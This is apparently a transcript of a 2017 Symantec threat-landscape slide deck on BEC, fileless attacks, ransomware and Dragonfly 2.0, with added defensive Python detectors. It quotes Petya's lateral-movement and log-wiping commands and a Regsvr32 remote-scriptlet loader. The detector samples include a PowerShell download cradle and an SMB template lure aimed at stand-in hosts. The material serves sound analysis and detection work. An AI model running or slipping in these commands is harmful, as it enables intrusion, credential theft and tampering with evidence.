
Threat landscape update: June to September 2017

Read about the latest trends in the threat landscape as seen between June and September 2017, including BEC and ransomware.



  1. Threat Landscape Q2 / 2017 Update (Asim Rab, Candid Wueest, Sept 2017)
  2. General trends (Copyright © 2017 Symantec Corporation)
     Simple, but successful:
     o Low-tech attacks (BEC)
     o Living off the land and fileless
     o Emails with social engineering
     Focused and selective:
     o More ransomware in corporations
     o Selective spreading of malware
     o Attacking supply chain companies
  3. Malware statistics
     o More than 2 million new malware variants per day
     o Script malware leads to many variants

     Region          % of global
     USA               27.26%
     Japan              6.49%
     China              6.04%
     India              5.82%
     Brazil             4.12%
     Germany            3.97%
     Great Britain      3.59%
     Canada             2.65%
     France             2.55%
     Russia             2.32%
     Australia          2.17%
     Italy              2.03%
     Mexico             1.67%
     South Korea        1.34%
     Turkey             1.28%
     Netherlands        1.27%
     Spain              1.26%
     Indonesia          1.11%
     Poland             1.08%
     Taiwan             0.90%

     [Chart: new malware variants per month in millions, January to August]
  4. Web attacks still elevated
     o Normally no 0-day exploits used
     o RIG toolkit is most active
     o Link spread by email or advertisement
     o Sometimes infections are restricted to specific IP addresses
     o Supply chain attacks increased
     [Chart: web attacks blocked per day, January to August]
  5. Malicious documents still common
     o Malicious document containing a macro, delivered with social engineering
     o Embedded binary can be double-clicked
  6. Email attack chain (whitepaper available)
     o More than half of the malicious attachments are script files
     o Macros or JavaScript usually download the final payload
     o Most common payloads are ransomware and financial Trojans
     Chain: Email (e.g. invoice or receipt) -> Attachment (e.g. JavaScript) -> Downloader (e.g. PowerShell) -> Payload (e.g. ransomware)
  7. Section 2: Business Email Compromise (BEC)
  8. Low-tech attacks: Business email compromise
     o Spear-phishing taken to the next level
     o Convince the company to perform a payment transaction
     o Scams often use typo-squatted domains
     o Some attacks change the IBAN in invoices
     o Exposed losses Oct 2013 – Dec 2016 were over $5bn
     o 8,000 businesses targeted monthly
     [Chart: BEC emails received per targeted organization, Jan to Jun: 4.3, 6.8, 4.5, 5.1, 5.9, 4.6]
  9. BEC subject lines
     o Create a sense of urgency, requiring immediate action, attempting to pressure the recipient into acting
     o The top three subjects (PAYMENT, URGENT, REQUEST) feature in 2/3 of all emails
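The two BEC tells the slides above name, typo-squatted sender domains and payment subjects built around urgency words, turned into a triage heuristic. This is an added example written for this summary, not Symantec code; the trusted-domain allow-list, the urgency word list and all sample messages are constructed for illustration.

```python
"""Heuristic BEC triage over constructed sample messages.

Added example for this summary, not Symantec code. It checks for a sender
domain that is a typo-squat of a domain the organisation trusts, a subject
built around the top BEC words (PAYMENT, URGENT, REQUEST), and a body that
announces a changed IBAN. The trusted-domain list and all sample messages
below are constructed.
"""
from dataclasses import dataclass
from typing import Optional

TRUSTED_DOMAINS = {"example-corp.com", "supplier-invoices.com"}   # assumed allow-list
URGENT_WORDS = {"payment", "urgent", "request", "immediately", "wire", "transfer"}
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"))   # common look-alike swaps


@dataclass
class Message:
    sender: str
    subject: str
    body: str


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, sufficient for domain-length strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_domain(domain: str, trusted=TRUSTED_DOMAINS) -> Optional[str]:
    """Return the trusted domain that `domain` imitates, or None.

    A domain that is not itself trusted counts as a look-alike when it is
    within edit distance 2 of a trusted domain (dropped, swapped or doubled
    letters) or becomes equal to one after undoing homoglyph substitutions.
    """
    domain = domain.lower()
    if domain in trusted:
        return None
    folded = domain
    for glyph, real in HOMOGLYPHS:
        folded = folded.replace(glyph, real)
    for t in trusted:
        if folded == t or levenshtein(domain, t) <= 2:
            return t
    return None


def score(msg: Message) -> dict:
    """Collect the individual tells so an analyst can see why a message fired."""
    findings = {}
    imitated = lookalike_domain(msg.sender.rsplit("@", 1)[-1])
    if imitated:
        findings["lookalike_domain"] = imitated
    words = {w.strip(".,:!?") for w in msg.subject.lower().split()}
    urgency = sorted(words & URGENT_WORDS)
    if urgency:
        findings["urgent_subject"] = urgency
    body = msg.body.lower()
    if "iban" in body and any(k in body for k in ("chang", "new ", "updat")):
        findings["iban_change"] = True
    return findings


def is_suspicious(msg: Message) -> bool:
    """A typo-squat or an IBAN change alone is enough to hold the message;
    urgency alone is too noisy to act on and is kept only for context."""
    f = score(msg)
    return any(k in f for k in ("lookalike_domain", "iban_change"))


SAMPLES = [  # constructed messages, not real mail
    Message("cfo@exarnple-corp.com", "URGENT: payment request", "Please wire today."),
    Message("billing@supplier-invoices.com", "Invoice 4471", "Attached as usual."),
    Message("billing@supplier-invoices.com", "Invoice 4472",
            "Note our IBAN has changed; please pay to the new account."),
    Message("hr@example-corp.com", "Urgent request", "Please review the attached policy."),
]

if __name__ == "__main__":
    for m in SAMPLES:
        print(m.sender, is_suspicious(m), score(m))
```

The first message is held because "exarnple" folds to "example" (the rn/m homoglyph); the third because a trusted supplier announcing a new IBAN is exactly the invoice-tampering case the slide describes and needs out-of-band confirmation; the fourth, urgent but from a trusted domain, is only annotated.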
  10. Section 3: Living off the land (whitepaper available)
  11. Living off the land: when attackers turn what you have against you
     o Fewer new files on disk: the attack is more difficult to detect and there is no IoC to share
     o Use of off-the-shelf tools and cloud services: difficult to determine intent and source
     o These tools are ubiquitous: hiding in plain sight
     o Finding exploitable zero-day vulnerabilities is getting more difficult: attackers use simple and proven methods such as email and social engineering
  12. Fileless attacks: multiple fileless options exist, but not all are truly fileless
     o Memory-only attacks, e.g. remote code exploits such as EternalBlue and CodeRed
     o Fileless loadpoint: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
     o Non-PE files: documents containing macros, PDFs with JavaScript, and scripts (VBS, JavaScript, PowerShell, ...)
     o Dual-use tools: using benign tools, such as PsExec, to do malicious things
  13. Living off the land attack chain
     Incursion:
     o Exploit in memory, e.g. SMB EternalBlue
     o Email with non-PE file, e.g. document macro
     o Weak or stolen credentials, e.g. RDP password guess
     o Remote script dropper, e.g. LNK with PowerShell from cloud
     Persistence:
     o Non-persistent: memory-only malware, e.g. SQL Slammer
     o Persistent: fileless persistence loadpoint, e.g. JScript in registry; or traditional methods
     Payload:
     o Regular non-fileless payload
     o Non-PE file payload, e.g. PowerShell script
     o Memory-only payload, e.g. Mirai DDoS
     o Dual-use tools, e.g. netsh or PsExec.exe
  14. Non-PE files (whitepaper available)
     o Scripts are very common, especially PowerShell
     o Many script toolkits available, e.g. PS Empire
     o Scripts are easy to obfuscate and difficult to detect with signatures
     o Scripts are flexible and can be adapted quickly
  15. Fileless loadpoints. Example: remote SCT load
     o Registry run key can point to a remote SCT file
     o Regsvr32 will download and execute the embedded JScript:
       Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
     o Downloader.Dromedan (40,000 detections per day)
     o Embedded JScript uses WMI to execute a PowerShell payload
     o Script stores an encoded DLL in the registry for later use
  16. Section 4: Ransomware (whitepaper available)
  17. Ransomware stats
     o Ransomware is still profitable and common
     o Multiple self-propagating variants appeared
     [Chart: ransomware detections per month, Jan-16 to Jun-17, with trend line]
     Share by country: United States 29%, Japan 9%, Italy 8%, India 4%, Germany 4%, Netherlands 3%, UK 3%, Australia 3%, Russia 3%, Canada 3%, other countries 31%
  18. Ransomware in enterprises
     o 42% of ransomware infections in 2017 were in enterprises, due to WannaCry and Petya
     o Attacks against cloud storage increased
     [Chart: ransomware infections per month, Jan-16 to Jun-17, consumer vs. enterprise]
  19. WannaCry
     o 1 billion EternalBlue infection attempts blocked
     o Profit $140K; Bitcoin accounts emptied August 3rd
     o Linked to Lazarus group
  20. Petya
     o Petya (June variant) classified as a wiper
     o Semi-targeted infections through supply chain hack (MEDoc)
     o Profit $10K; Bitcoin account emptied July 4th
  21. Petya uses dual-use tools
     o Threat is a DLL executed by rundll32.exe
     o Uses a recompiled version of Mimikatz's LSADump to get passwords
     o Uses PsExec to propagate:
       \\[server_name]\admin$\perfc.dat
       psexec rundll32.exe c:\windows\perfc.dat #1 [RANDOM]
     o Uses WMI to propagate if PsExec fails:
       wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe \"%Windows%\perfc.dat\" #1 60"
     o Scheduled task to restart into the malicious MBR payload:
       schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
     o Deletes log files to hide traces:
       wevtutil cl Setup & wevtutil cl System & ... & fsutil usn deletejournal /D %C:
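Because the tools in the Regsvr32 loadpoint slide and the Petya slide are legitimate Windows binaries, detection has to key on how they are invoked rather than on the binary. The following is an added example written for this summary, not Symantec code: a handful of command-line rules run over constructed Sysmon-style process-creation records shaped like the commands on those two slides, with PowerShell -EncodedCommand blobs decoded first so that the obfuscated download cradles mentioned on the Non-PE slide are matched as well. The record fields (host, image, cmdline), the rule set and every sample record are assumptions of this example; the IP addresses are documentation ranges.

```python
"""Rule-based triage of process-creation events for dual-use tool abuse.

Added example for this summary, not Symantec code. It runs regex rules
over constructed Sysmon-style process-creation records shaped like the
commands on the Regsvr32 and Petya slides (remote scriptlet load,
wmic/psexec remote execution, rundll32 loading a non-DLL module, a forced
reboot via schtasks, event-log and USN-journal clearing) and decodes
PowerShell -EncodedCommand blobs so obfuscated download cradles match too.
The record fields and every sample record are assumptions of this example.
"""
import base64
import re

RULES = [  # (rule name, pattern applied to the full command line)
    ("regsvr32_remote_scriptlet",
     re.compile(r"regsvr32(\.exe)?\s.*?/i:\S*https?://.*scrobj\.dll", re.I)),
    ("wmic_remote_process_create",
     re.compile(r"wmic(\.exe)?\s.*?/node:\S+.*?process\s+call\s+create", re.I)),
    ("psexec_remote_exec", re.compile(r"psexec(\.exe)?\s+\\\\\S+", re.I)),
    ("rundll32_non_dll_module",
     re.compile(r"rundll32(\.exe)?\s+\S+\.(dat|txt|bin|tmp)\b", re.I)),
    ("schtasks_forced_reboot",
     re.compile(r"schtasks\s.*?/create\b.*?/tr\s+\S*shutdown(\.exe)?\s+/r", re.I)),
    ("eventlog_clear", re.compile(r"wevtutil(\.exe)?\s+cl\s", re.I)),
    ("usn_journal_delete", re.compile(r"fsutil\s+usn\s+deletejournal", re.I)),
    ("powershell_download_cradle",
     re.compile(r"DownloadString|DownloadFile|Net\.WebClient|\bIEX\b|Invoke-Expression", re.I)),
]

# -e, -ec, -enc and -EncodedCommand all take a base64 blob of UTF-16LE script
ENCODED = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_command(cmdline: str) -> str:
    """Replace an -EncodedCommand blob with its decoded script so rules can see it."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[:m.start(1)] + decoded + cmdline[m.end(1):]


def match_rules(event: dict) -> list:
    """Names of all rules the event trips, in RULES order."""
    text = expand_command(event["cmdline"])
    return [name for name, pat in RULES if pat.search(text)]


def triage(events) -> dict:
    """Rule hits grouped per host; hosts with no hits are omitted."""
    hits = {}
    for ev in events:
        names = match_rules(ev)
        if names:
            hits.setdefault(ev["host"], []).extend(names)
    return hits


def _enc(script: str) -> str:
    """Encode a script the way powershell.exe expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"host": "ws01", "image": "regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"},
    {"host": "ws02", "image": "wmic.exe",
     "cmdline": "wmic.exe /node:10.0.0.12 /user:CORP\\svc /password:Pa55 "
                "process call create \"rundll32.exe C:\\Windows\\perfc.dat,#1 60\""},
    {"host": "ws02", "image": "psexec.exe",
     "cmdline": "psexec.exe \\\\10.0.0.13 -accepteula -s rundll32.exe C:\\Windows\\perfc.dat,#1 15"},
    {"host": "ws02", "image": "schtasks.exe",
     "cmdline": "schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" "
                "/TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 14:42"},
    {"host": "ws02", "image": "cmd.exe",
     "cmdline": "wevtutil cl Setup & wevtutil cl System & fsutil usn deletejournal /D C:"},
    {"host": "ws03", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')")},
    {"host": "ws04", "image": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(host, sorted(set(names)))
```

Grouping hits per host is the point: a single rundll32 or schtasks hit is routine administration, but ws02 tripping remote execution, a forced reboot and log clearing within one batch is the Petya sequence from the slide. The encoded-command rule only scans the decoded script, never the raw base64, so random letter runs in the blob cannot trigger the cradle pattern.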
  22. Section 5: Targeted attack groups
  23. Dragonfly 2.0 (slide deck available)
     o Active since December 2015 in Europe and North America
     o Ongoing attacks against the energy sector, mainly in Turkey and the U.S.
     Infiltration:
     o Compromised websites and spear phishing (Phishery toolkit)
     o Trojanized software, using the Shellter evasion framework
     o Various backdoors: Trojan.Listrix, Trojan.Credrix, Backdoor.Goodor, Backdoor.Dorshell, Trojan.Karagany.B, Trojan.Heriplor
  24. Dragonfly 2.0 (continued)
     o Uses living off the land tactics: PowerShell, PsExec, and BITSAdmin
     o Phishery toolkit became available on GitHub in 2016
     o Document used an SMB template link to leak credentials
     o Screenutil and Shellter are available online
     Goal:
     o Information stealing: passwords, documents and screenshots
     o Potential for sabotage attacks
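The "SMB template link" in the slide above refers to a Word document whose attached template points at an attacker-controlled share, so that Word fetches the template over SMB when the file is opened and authenticates on the victim's behalf. As an added example for this summary (not Symantec's or the attackers' tooling), the following checker inspects a .docx for that construct: the attached template is declared as an attachedTemplate relationship in word/_rels/settings.xml.rels with TargetMode="External", and a UNC or URL target there is the tell. The two archives it examines are constructed in memory; the IP addresses are documentation ranges.

```python
"""Find Office documents whose attached template points at a remote location.

Added example for this summary, not Symantec's or Dragonfly's tooling. In a
.docx the attached template is an attachedTemplate relationship in
word/_rels/settings.xml.rels with TargetMode="External"; a UNC or URL target
makes Word reach out (and authenticate) over the network when the file opens.
The archives inspected below are constructed in memory.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/attachedTemplate")
# UNC paths and URLs are fetched over the network; plain local paths are not
REMOTE_TARGET = re.compile(r"^(\\\\|//|file:|https?:|ftp:)", re.I)


def external_template_targets(docx_bytes: bytes) -> list:
    """Return every attachedTemplate target that is both external and remote."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue  # only relationship parts of the main document
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % PKG_NS):
                if rel.get("Type") != TEMPLATE_REL:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                    findings.append(target)
    return findings


def build_docx(template_target=None) -> bytes:
    """Constructed minimal .docx; given a target, attach it as an external template."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    rels = ['<Relationships xmlns="%s">' % PKG_NS]
    settings = '<w:settings xmlns:w="%s" xmlns:r="%s">' % (w_ns, r_ns)
    if template_target is not None:
        rels.append('<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>'
                    % (TEMPLATE_REL, template_target))
        settings += '<w:attachedTemplate r:id="rId1"/>'
    rels.append("</Relationships>")
    settings += "</w:settings>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", '<w:document xmlns:w="%s"><w:body/></w:document>' % w_ns)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


CLEAN_DOCX = build_docx()                                        # no attached template
LOCAL_DOCX = build_docx("C:\\Templates\\Normal.dotm")            # external but local: benign
LURE_DOCX = build_docx("\\\\198.51.100.7\\share\\invoice.dotm")  # SMB share: credential leak

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOCX), ("local", LOCAL_DOCX), ("lure", LURE_DOCX)):
        print(label, external_template_targets(doc))
```

A local external template (the Normal.dotm case) is ordinary and is deliberately not reported; only targets that force a network fetch are. The same check applies to any relationship type whose target Office resolves on open, so extending TEMPLATE_REL to a set of relationship types is the natural next step for a mail gateway.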
  25. Supply chain attacks increasing
     o Many cases where legitimate software was compromised
     o Fast and semi-targeted distribution through the update process
     o Trojanized updates are difficult to discover: trusted domain, digitally signed, trusted update process, ...
     Examples:
     o MEDoc (Petya, June 2017)
     o CCleaner (Aug 2017)
     o Python modules (Sept 2017)
     o ICS supplier (Dragonfly 2014)
  26. Summary
     o Cybercriminals are focusing on simple but effective methods
     o Ransomware is still very prevalent
     o Living off the land tactics are increasingly used
     o Often targeted infections with limited distribution